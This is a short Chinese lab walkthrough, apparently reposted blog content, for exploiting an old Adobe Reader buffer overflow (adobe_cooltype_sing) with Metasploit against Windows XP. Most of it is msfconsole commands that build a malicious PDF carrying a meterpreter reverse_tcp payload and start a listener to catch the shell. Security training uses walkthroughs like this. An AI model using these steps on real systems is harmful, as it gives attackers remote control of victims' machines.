Metasploits之Adobe阅读器漏洞

实验环境:Kali 2.0+Windows XP+Adobe Reader 9.3.0

类别:缓冲区溢出

描述:这个漏洞针对Adobe阅读器9.3.4之前的版本,一个名为SING表对象中一个名为uniqueName的参数造成缓冲区溢出。


 

msfconsole    启动Metasploits
search cooltype_sing    搜索Adobe阅读器漏洞(adobe_cooltype_sing)相关模块 
use exploit/windows/fileformat/adobe_cooltype_sing    加载此模块

show options    查看所需的参数
show targets    查看受此漏洞影响的版本
show payloads    查看有效攻击载荷(就是攻击代码)

set payload windows/meterpreter/reverse_tcp    选定攻击载荷
show options 查看攻击载荷所需的参数
set LHOST 192.168.9.128    设置本机IP
exploit    生成pdf攻击文件

复制生成的PDF文件到XP系统
XP系统安装阅读器Adobe Reader 9.3.0
use exploit/multi/handler    加载监听模块
run    启动

 

转载于:https://www.cnblogs.com/SzSec/p/7245357.html

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值